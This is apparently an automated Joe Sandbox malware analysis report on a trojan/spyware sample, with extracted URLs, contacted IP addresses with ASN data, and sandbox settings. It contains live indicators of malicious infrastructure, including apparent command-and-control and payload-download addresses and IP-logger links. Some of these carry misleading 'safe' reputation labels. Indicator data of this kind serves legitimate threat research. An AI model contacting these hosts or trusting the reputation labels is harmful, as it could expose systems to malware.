                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=F0geI.exe, 0000000E.00000003.390549774.0000000003CAE000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.870304762.0000000003236000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000003.372438638.00000000285A0000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.554787504.000000002781F000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestednamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://62.204.41.126:80q1wLT3xKiY.exe, WW1.exe, 0000001F.00000002.742694757.00000000001B3000.00000002.00000001.01000000.00000013.sdmp, WW1.exe, 0000001F.00000000.344396019.00000000001B3000.00000002.00000001.01000000.00000013.sdmptrue
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegonamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressingnamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://45.95.11.158/11F0geI.exe, 0000000E.00000002.468773615.000000000073F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuenamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600taF0geI.exe, 0000000E.00000003.406575357.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.410875228.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.398228449.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.413737168.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.396363092.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.405647250.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.408359829.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.400990098.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.409321567.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.414431083.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d6007hL2vK/nss3.dllF0geI.exe, 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://web.telegram.orgZreal.exe, 00000016.00000003.335520526.0000000001480000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsenamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://iplogger.org/1AJmX4xq1wLT3xKiY.exe, 00000000.00000002.388956868.0000000000747000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://tempuri.org/Entity/Id5Responsenamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.867825172.00000000031C3000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDsafert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsnamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://tempuri.org/Entity/Id10Responsenamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Renewnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id8Responsenamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://62.204.41.126:801170NULL%sWW1.exe, 0000001F.00000002.742694757.00000000001B3000.00000002.00000001.01000000.00000013.sdmp, WW1.exe, 0000001F.00000000.344396019.00000000001B3000.00000002.00000001.01000000.00000013.sdmptrue
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  low
                                                                                                                  https://iplogger.org$q1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  low
                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2006/02/addressingidentitynamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://77.91.103.222:80/3610134416.zipCreal.exe, 00000016.00000003.357918765.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.368333119.00000000014C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeynamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://45.95.11.158/Q2mF0geI.exe, 0000000E.00000003.367804271.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.406575357.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.410875228.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.308958287.0000000000713000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.398228449.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.390750632.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.413737168.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000002.467977911.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.396363092.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.375938581.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.405647250.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.357431228.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.408359829.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.400990098.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.409321567.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.370161583.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.414431083.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://iplogger.org/1ARXq1wLT3xKiY.exe, 00000000.00000003.345524937.00000000020C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollbacknamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/06/addressingexnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/Noncenamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsenamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://t.me/v_totalbrokerius.exe, 0000001A.00000000.319293478.0000000000064000.00000002.00000001.01000000.0000000F.sdmp, brokerius.exe, 0000001A.00000002.586136354.0000000000064000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://cdn.discordapp.comSETUP_~1.EXE, 00000028.00000002.866354989.0000000002AAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600TF0geI.exe, 0000000E.00000002.468773615.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.391415880.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.372312694.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.407719860.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.412792997.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.413897712.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.378491728.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.397115573.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.393842203.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.409958751.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.369754344.000000000073F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://77.91.103.222:80/3610134416.ziphreal.exe, 00000016.00000002.413066984.0000000000F3D000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://mas.to/brokerius.exe, 0000001A.00000000.319293478.0000000000064000.00000002.00000001.01000000.0000000F.sdmp, brokerius.exe, 0000001A.00000002.586136354.0000000000064000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://iplogger.org/1AKmX4.q1wLT3xKiY.exe, 00000000.00000003.348874687.0000000000757000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://tempuri.org/Entity/Id13Responsenamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Committednamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertynamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://62.204.41.126:80/0659920757.ziphWW1.exe, 0000001F.00000002.745178648.00000000012FD000.00000004.00000010.00020000.00000000.sdmptrue
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementnamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoF0geI.exe, 0000000E.00000003.390549774.0000000003CAE000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.870304762.0000000003236000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000003.372438638.00000000285A0000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.554787504.000000002781F000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600lF0geI.exe, 0000000E.00000002.467977911.0000000000710000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600wF0geI.exe, 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousnamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600rF0geI.exe, 0000000E.00000002.468773615.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.407719860.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.412792997.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.413897712.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.397115573.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.393842203.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.409958751.000000000073F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrapnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      77.91.103.222
                                                                                                                                                                      unknownRussian Federation
                                                                                                                                                                      42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfalse
                                                                                                                                                                      8.8.4.4
                                                                                                                                                                      dns.googleUnited States
                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                      142.251.209.4
                                                                                                                                                                      www.google.comUnited States
                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                      45.95.11.158
                                                                                                                                                                      unknownItaly
                                                                                                                                                                      13487ULTRA-PACKETUStrue
                                                                                                                                                                      88.198.122.116
                                                                                                                                                                      unknownGermany
                                                                                                                                                                      24940HETZNER-ASDEfalse
                                                                                                                                                                      216.58.209.46
                                                                                                                                                                      clients.l.google.comUnited States
                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                      216.58.209.35
                                                                                                                                                                      unknownUnited States
                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                      149.154.167.99
                                                                                                                                                                      t.meUnited Kingdom
                                                                                                                                                                      62041TELEGRAMRUfalse
                                                                                                                                                                      176.113.115.146
                                                                                                                                                                      unknownRussian Federation
                                                                                                                                                                      49505SELECTELRUfalse
                                                                                                                                                                      172.67.8.238
                                                                                                                                                                      cutt.lyUnited States
                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                      103.89.90.61
                                                                                                                                                                      unknownViet Nam
                                                                                                                                                                      135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                                                                                                                                                                      239.255.255.250
                                                                                                                                                                      unknownReserved
                                                                                                                                                                      unknownunknownfalse
                                                                                                                                                                      62.204.41.126
                                                                                                                                                                      unknownUnited Kingdom
                                                                                                                                                                      30798TNNET-ASTNNetOyMainnetworkFIfalse
                                                                                                                                                                      148.251.234.83
                                                                                                                                                                      iplogger.orgGermany
                                                                                                                                                                      24940HETZNER-ASDEfalse
                                                                                                                                                                      142.251.209.42
                                                                                                                                                                      unknownUnited States
                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                      195.54.170.157
                                                                                                                                                                      unknownunknown
                                                                                                                                                                      51171VALICOM-ASPTfalse
                                                                                                                                                                      142.250.180.141
                                                                                                                                                                      accounts.google.comUnited States
                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                      162.159.134.233
                                                                                                                                                                      cdn.discordapp.comUnited States
                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                      IP
                                                                                                                                                                      192.168.2.1
                                                                                                                                                                      127.0.0.1
                                                                                                                                                                      Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                                      Analysis ID:688997
                                                                                                                                                                      Start date and time:2022-08-23 18:24:44 +02:00
                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 20m 41s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Sample file name:q1wLT3xKiY.exe
                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                      Number of analysed new started processes analysed:64
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • HDC enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@133/206@18/20
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 66.7%
                                                                                                                                                                      HDC Information:
                                                                                                                                                                      • Successful, ratio: 13.4% (good quality ratio 9.1%)
                                                                                                                                                                      • Quality average: 33.6%
                                                                                                                                                                      • Quality standard deviation: 29.7%
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      • Number of executed functions: 56
                                                                                                                                                                      • Number of non-executed functions: 143
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Override analysis time to 240s for rundll32
